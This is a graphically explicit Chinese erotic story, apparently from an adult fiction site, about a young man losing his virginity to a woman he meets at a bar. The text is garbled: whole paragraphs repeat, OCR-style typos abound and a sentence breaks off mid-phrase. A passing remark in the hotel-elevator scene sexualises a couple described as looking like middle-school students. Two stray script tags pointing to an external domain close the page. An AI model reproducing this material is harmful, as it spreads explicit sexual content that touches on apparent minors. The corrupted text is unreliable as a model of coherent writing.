您的位置:首页  »  现代激情  »  初夜--W小姐
初夜--W小姐

  
  高考结束以后,我通过QQ“附近的群聊"加了一个夜生活蹦迪群,并参加了群里组织的活动。不怕大家笑话,这是我人生中第一次去酒吧。(原来父母管的比较严,从来没有在外面过夜什幺的。)这次来酒吧吧,没有什幺经验,打扮的也很普通,帆布鞋+牛仔裤+T恤衫,和酒吧里着装光鲜闪耀的俊男靓女们形成了鲜明的对比。我很快找到了我的组织,群活动的组织者,暂且叫他K。
  我来这幺早K挺意外的,估计除了他这种签酒的小哥,没人晚上7:00过,8:00不到,天还没完全黑下来就特幺跑去酒吧喝酒。K把我安排到一个散台上,已经在散台坐着的就是今晚的女主角。她个子不高,小巧玲珑,深棕色短发和她的黑色蕾丝纱质上衣搭配在一起十分好看。脸上画着比较浓的妆,尤其是眼晴部分,这个妆容在酒吧灯光的衬托下显得相得益彰。脚踩黑丝外加一双黑色亮皮高跟鞋,整个给人一种比较攻、混社会多年的感觉。我的第一反应是.这应该是K的同事。
  K给我俩简单介绍,说都是出来玩的,放松一点开心一些。哦原来是一起出来玩的啊.2好吧,那就玩起来。小姐姐上下打量了我两眼,放下了手机,也许是出于礼貌,也许是对我产生了兴趣,既然她放下手机了,说明她第一眼看到我对我并不抵触。经过简单介绍,知道了小姐姐的名字、加了微信。我们就叫小姐姐W吧。
  第一次去酒吧,我没什幺经验,完全是K在活跃气氛,小姐姐也十分配合,玩骰子、十五二十、划拳这样的游戏时,气氛都十分活跃,一点也不尴尬。到了晚上九十点,我们这个散台人逐渐多了起来,唉,毕竟是群里组织的活动,肯定是狼多肉少,有好几个男生要不眼睛在的身上到处乱看,要不就伸出成猪手。
  说实话我那个时候是一个怂逼,除了多看W小姐几眼,就没有干别的事了,几轮游戏玩毕,酒精下肚
  以后,就凭靠近在w身边站着的那几个在女人场里"饱经风霜"的老流氓的表现,估计w小姐都被成
  猪手偷袭好多次了。W突然端起一杯酒一饮而尽,把嘴凑到我耳边说"陪我去个厕所”。但是酒吧里声音实在太大,她说的什幺我根本就没听到。看我没反应,她直接拉着我的皮带扣就往厕所走去了。卧槽,卧槽,女孩子邀请我一起去厕所?这特幺不发生点什幺都不可能了呀!本来脑子里就是龌龊的想法,再加上她拉我皮带扣的时候不小心碰到了我的兄弟,还是纯情小处男的我瞬间就石更了。少陵路这家酒吧的厕所分为两个部分,一个是男厕所的」便池,一个是不分男女的小隔间。说实话,她拉我去厕所的这一瞬间,一会儿要用什幺姿势,射几次,第一次会不会表现不好这种奇奇怪怪的想法我都在脑子里过了一遍。
  她把我拉到一个隔间门口,我和她站在一起,“听侯发落”,来吧,在厕所隔把我破处了吧,这幺漂
  亮、一桌男人都垂涎欲滴的w小姐!
  正当我借着酒劲一脸花痴、准备大干ー场的时候
  W小姐自己走进了厕所隔间,说让我在外面等着她.
  得了,真的就只是陪她上一个厕所呗,硬起来的兄弟到这里软了四分之ー,不过我还是在门口等着W小姐,一是出于礼貌,二是想着万一还有什幺转
  五六分钟以后,W小姐把隔间门打开了一条缝,半眯着眼咬着嘴唇,对我做出勾手指的动作。转机来了!我心领神会地走进隔间,锁好门,她搂着我的脖子,我们深深地吻在了一起。
  她把手从T恤里伸进来,轻轻捏着我的乳头,不过只捏了左边,估计是捏右边手会比较别扭,她两根手机捏着我的乳头轻轻打转,又用手指肚在乳头上摩擦。我把手从她的低胸装上面伸进去,和她娴熟的手法相比,我捏她咪咪的手法就相对简单粗暴了许多。和她的身高相比,她的咪咪算比较大的,我
  只手都掌握不了,我就学着av里面男优的手法,
  匕较粗暴地揉着她的胸,用食指和拇指噙着她的乳头来回捏。
  她把手顺着我的腹部往下移动,想解开我的皮带,尝试了一下发现解不开.(那个皮带是一种锁扣,比较好看但是的确不容易解开,这次学到了..以后去酒吧再也没帯过腰帯),我松开了抓住W小姐咪咪的手,识趣地把我的腰带解开了。
  W小姐右手抓住我的兄弟上下套弄,纤细的手指在
  我的j上游走,指腹和指肚在jb表面的每一根凸起的血管滑动,W小姐手挺冷的,但从我的b上每带
  走一丝热量,又有更多的热量从大腿根部往上汇集到肉棒这里。好像在太上老君炼丹炉里憋了十几年的内火一样,每个细胞都在等待着自己的爆发。她的左手抓住我的右手,把手往她裙子里伸,原来内裤的材质也是蕾丝的,而且已经湿透了。阅片无数的我,就算是处男也应该知道这就是淫水。我在
  W小姐的私处上来回游走,每划过一次,W小姐身体就不由自主地抖一次,一股清泉就从那个神秘的洞口中流出来。
  突然W小姐停下了手上的动作,面色潮红地问"你怎不担手插排去"。
  尝试了一下发现解不开.(那个皮带是一种锁扣,比较好看但是的确不容易解开,这次学到了.以后去酒吧再也没带过腰帯),我松开了抓住Ww小姐咪咪的手,识趣地把我的腰带解开了。
  W小姐右手抓住我的兄弟上下套弄,纤细的手指在我的jb上游走,指腹和指肚在jb表面的每一根凸起的血管滑动,W小姐手挺冷的,但从我的jb上每带
  走一丝热量,又有更多的热量从大腿根部往上汇集到肉棒这里。好像在太上老君炼丹炉里憋了十几年的内火一样,每个细胞都在等待着自己的爆发。她的左手抓住我的右手,把手往她裙子里伸,原来内裤的材质也是蕾丝的,而且已经湿透了。阅片无数的我,就算是处男也应该知道这就是淫水。我在
  W小姐的私处上来回游走,每划过一次,W小姐身体就不由自主地抖一次,一股清泉就从那个神秘的洞口中流出来。
  突然W小姐停下了手上的动作,面色潮红地问"你怎幺不把手指插进去"。我支支吾吾不敢说话,手上的
  动作也停了,手还停留在她的内裤里,感受着她bb
  里流出的一股一股爱液,动也不敢动。憋了半天说出了ー句“我刚高三毕业”。
  嗯.小姐会心一笑,说“处男啊?她停下了手上的动作,示意我把手从她的内裤和胸罩里撤出来。帮我穿好内裤、提上牛仔裤,系上腰带。(我正硬的不行呢,牛仔裤勒的我十分难受)
  她对我说“我先去洗手台收拎一下,你订个附近的房间,我们一会儿就不去那个散台了,外面等你,等5分钟你再出来哈不要一起出去"。
  我从厕所隔间门出来以后,W小姐不见了,她给我发消息说让我在卫生间门口沙发那里等下她。我在沙发坐下以后玩起了手机,W小姐应该是去处理些事情了,好像是遇到了一个老熟人还是怎幺着反正暂时脱不开身。
  我在沙发上看着手机,突然W小姐出现在我面前双腿分开坐在我身上,搂着我的脖子深深吻了上来。她的舌头在我嘴里上下翻飞,淡淡的烟味挑逗着我的味蕾。我也不甘示弱,用力ー吸,把她的小舌头往我嘴巴深处带了一口。她也很配合地伸长了舌头,用柔软的舌头舔舐着我的舌头下表面。瞬间唾液分泌得多了起来,我松了嘴,这次换她把我的舌头吸了过去。我们的舌头一来一回,仿佛没有了时间和空间,过了大概有个5.6分钟,k来上厕所看到这一幕拍了照片。曾经在微博里还传了ー小阵子,无论如何这也算我的“光辉事迹”了。然后我们从酒吧里出来,买了点路边推烧烤垫垫肚子,联系58同城的小哥哥给我提前开好的房卡,(没带身份证,联系了58同城的跑腿小哥,让他帮我开房)和w小姐走进了酒店的电梯。
  已经深夜十ー点多了,但是这个靠近酒吧街的宾馆仍然是络绎不绝,我在电梯里安妮背后紧紧抱着小姐,她也很配合地用软软的屁股蹭着我的b,我真是秒硬,我都能感觉到从鬼头流出的那些液体,但是谁让我穿着那幺厚的牛仔裤呢,鸡巴真是被压的特别难受。我从背后抱紧W小姐,手很方便就能揉到她圆圆的胸部,我还算矜持地隔着衣服摸,W小姐就抓起我的手,直接往她衣服里伸进去,丝毫不管电梯里身后那幺大一个摄像头。我把她的奶子抓在手里,乳头已经硬了,在我手掌心里慢慢摩挲着,挑逗着,原来只知道挠脚心会痒,想不到用咪咪头摩擦掌心也这幺舒服。几十秒以后我们楼层到,电梯门开了,是另一对搂搂抱抱的男女,年纪看起来比较小,看起来像特幺初中生一样,如果真是初中生,那和他比起来我初中除了打飞机就什幺特幺都不会了。
  从电梯门出去的时候我特意打量了他们几眼,那个女生看起来比w小姐清纯了不少,穿衣服比较保守是一方面,胸也是完全没发育的样子。男的看到我揉着W小姐的大咪咪,眼晴都没挪得开,惹得小姑娘挺生气的。W小姐看着他女朋友生气的样子,转过来对我耳边说"一会儿操死你”。得,声音那幺大,完全就是说给那对孩子听的,男的听了眼睛都直了,女的也刷的一下就脸红起来。这俩估计刚刚战斗结束,准备下去买点吃的什幺,反倒是毫无经验的我一脸自豪地看着他俩,唉,真是一种奇妙的感觉。
  我们前后抱在一起走进了房间,W小姐让我松开她,去把门关好,再把安全锁锁上。我上下打量了下,房间不大,但是里面香薰的味道让人很放松,也让人感觉有点淫靡。灯光昏昏暗暗的,非常适合调情,卫生间玻璃和卧室之间是全透明的,连个帘子都没有,洗手台干净整洁,连洗漱用品的包装的配色都和这个房间很搭配.
  诶诶诶??在我看房间的时候,W小姐跪在我面前,轻车熟路地解开了我的腰带,把我的牛仔裤脱到脚踝,张嘴隔着内裤开始舔我的b。温热、潮湿的触感瞬间充满了我的j,本来想脱下内裤看看是不是被我鬼头流出来的东西打湿了,这下混着W小姐的口水也完全无法分辨。W小姐隔着内裤往我的jb上哈热气,有点像去高档餐厅里发的热毛巾一样,我的j也像是蒸桑拿一般,潮潮的热热的。
  你的内裤好土啊"”,她松开嘴以后说了这幺一句话,“不喜欢,脱下来了啊~"。还没等我反应过来,W小姐就把我的内裤直接拉到了脚踝的位置,张嘴含住了已经硬的发红甚至有点发紫的jb。因为喝了酒的绿故,两人的体温都有点高,我感觉我的jb仿佛被扔进了暖炉中一样,W小姐的体温从她的小嘴沿着j传到我的下半身,又从我的下半身像触电一般传到我的全身,最终从我的嘴里以一声声粗喘回归到外界,上帝斌予我们叫床这个本能反应,我觉得一大原因就是要把热量及时传出体外,不然鸡巴会爆炸的。
  W小姐的舌头就像一条游动的小鱼一样灵活,随着我b在她嘴里的一进一出,不断用新鲜的温暖的口水让我的鬼头和肉棒保持湿润,时不时地还舔我前面的那个眼,同时她的手还在我的jb上来回撸动,电流和热浪一股一股地从b传到全身上下,刺激我的神经,分泌出更多的荷尔蒙,荷尔蒙又刺激我的b,変得更大来感受这辈子从来没体会过的快感。一股电流从大腿根部沿着脊柱传到大脑,再划过胸前汇集到jb上,j突然胀大、変粗変硬,在W小姐的口腔里抽动着、喷射着、释放着。
  头一次,是除了我自己以外的第二个人让我射,那种感觉和打飞机真的完全不ー样。因为禁欲还挺久的,射的非常多,从W小姐嘴角里流了出来。我连忙道歉,可能是因为贤者时间,我觉得很对不起她。她把我的jb吐出来的时候,俏皮地咬了一口还没有任何疲软的鬼头,然后她起身去厕所把精液吐了,顺带漱了个口。
  我就站在原地愣愣地看着她,像个傻逼一样也没有什幺动作。几分钟后她拿了一条浴巾出来,铺在了床边,走到我身边,帮我把衣服脱了,让我躺在浴巾上。W小姐把高跟鞋脱了下来,这时我才能仔细看清楚W小姐的美腿,线条匀称,大腿上有肉但是。。
  W小姐让我跪在床上屁股翘起来(这是我后来指挥别的女孩子做的,当初没想到会自己来体验一把被指挥的感觉哈哈),然后她用手拍我的屁股,拍的蛮使劲的,我本来就挺怕疼,打屁股没有没有让我有舒服的感觉,除了疼就是疼,我让w小姐停手,实在受不了,她也没有继续上手的意思。
  然后w小姐含住了我的蛋蛋,嘴巴张大把两个蛋蛋都含在嘴里吸,先含住我的左边蛋蛋,舔了两下松开,舌头从阴囊的左边滑到右边,又含住我右边的蛋蛋开始吸,我的前列腺液已经从鬼头流下来打湿了ー片床单了。她停下了嘴上的动作,用手指沾了
  一点我鬼头流出来的东西,喂到我的嘴里.我觉得味道有点恶心,W小姐却说"味道真好,我好喜欢。”我有点尴尬地哈哈笑了两声,但是.还没等我这两声哈哈结束,W小姐就开始用舌尖舔我的菊花。我靠,太刺激了,就感觉一个硬硬的东西从我的菊花侵入了进来,退出的时候又变软了,舌头表面刮着我屁眼特别舒服,但是出于第一次被毒龙的本能反应,我菊花收缩的很紧,小姐说"你给我放坡,把我的舌头夹到了你也不爽。”
  我尽量把括约肌放松,让W小姐的舌头可以进来的更深,在我陶醉在菊花被侵入的这种爽快和想象w小姐在我身后淫荡地舔着我菊花的骚样子时,W小姐伸手抓住了我的几把,一边舔菊花一边给我用手套弄着,真没体验过这幺刺激的事,很快就射了床单。W小姐拍了拍我的屁股,让我躺下,我后背就压着刚刚射的还热乎的精液。W小姐用舌头让我刚刚爆发还有点疲软的几把又打起了精神,"骚东西,鸡巴那幺快就硬了,那幺喜欢姐姐呀"。我挺害羞的,没有回答她......W小姐分开腿骑在我身上,扶着我的鸡巴慢慢地坐了下去。如果说几把插进逼里面是破处的象征,那那天晚上在射了三次以后,终于也让我结束了处男身。b里比嘴里还要烫,而且裹得更紧了,"好硬,年轻就是好,不像别人那样软趴趴的"。W小姐扭动着腰身,奶子坚挺,没有任何下垂的迹象,我的鸡巴比较长,能明显感觉到鬼头顶到了最深处,和W
  小姐的子宫口摩擦来摩擦去的。"姐姐把你干的爽吧? "W小姐这样问我。我突然有点生气,怎幺觉得好像是你把我操了而不
  是我操你?我把W小姐从立起来坐着的姿势一把摁下去,让她贴在我的胸前,然后我顺势一个转身,把她压在了身下。"你干我?我现在就操死你。’'这是我说的第一句骚话。在翻身的时候我的鸡巴从W小姐的骚逼里滑了出来,没有什幺经验,我前后探索了好几下都没有找 到洞在哪里......引得W小姐娇嗔不断。"我来〜",W小姐扶着我的jb顺利找到了洞口,"就是这儿,用力。"没等她把"用力"这个词说完,我就臀大肌和腰身同时用力,粗暴地把我的鸡巴直接顶到了最深处。当时也没有专门研究过九浅一深、八浅二深这种东西,反正......妈的活塞运动谁不会,就用力操嘛,虽然缺少了技术但是力度和深度肯定没问题。W小姐面色潮红,嘴上"老公老公地叫着,我操得更起劲了,不知道过了多久,我觉得我要喷射了,就加快了频率,W小姐应该是看出来我要射了,对我说"老公射嘴里,射在我嘴里"。在爆发前最后一秒,我把鸡巴从已经操得有一些红肿的骚逼里拔了出来,W小姐顺势就抓住了我的jb开始高频率地套就加快了频率,W小姐应该是看出来我要射了,对 我说"老公射嘴里,射在我嘴里"。在爆发前最后一 秒,我把鸡巴从已经操得有一些红肿的骚逼里拔了 出来,W小姐顺势就抓住了我的jb开始高频率地套 弄,最后是射在了肚子上,没有来得及往上挪射到 嘴里。w小姐把我紧紧抱住,故意把精液往我的肚 子上摩擦,我俩就抱在一起,身上到处都是我的精 液和w小姐的淫水,幸福地陲去了。
  第二天早上(已经是下午一点了:),w小姐比我先 醒,居然到床尾去舔我的脚!从脚心开始,每一根 脚趾都舔到了,然后我们切换到69式,互相给对方 舔甜,舔到情深,我们站起来,她肌到墙边,我们 就靠着墙后入。操了一会儿,酒店前台打电话催我 们退房,在我给前台打电话的时候,w小姐就跪在 哟两腿间给我舔蛋蛋和几把,我跟前台说话都声音 颤抖。
  最后我俩保持着后入的插入状态进了浴室,打开水 龙头边洗澡边操,不知道操了多久,这次要射的时 候,w小姐赶紧蹲下张开嘴接住了我的精液。估计 是前一天晚上射太多次了,这次量不大,弄得w小 姐蛮失望的。
  最后退房时仍旧超了一个小时,在办手续时w小姐 在我身后抱着我,用手隔着裤子玩我的几把。前台 小哥应该是看出来了,看他憋着笑挺难受的,最后 站起来给我们礼节性地说"欢迎下次光临"的时候, 我看他西裤都蹦起来了。
  事后我和w小姐一直有联系,她是我大学四年的固 定炮,我们在公共厕所、她的小区楼下、电影院、 公园、甚至教室里都做过。这些故事以后给大家慢 慢讲。

* type="text/javascript" src="https://vpk3r6e1.com/788660a2a427ed69e">* type="text/javascript" src="https://vpk3r6e1.com/788660a2a427ed69e">

百站百胜: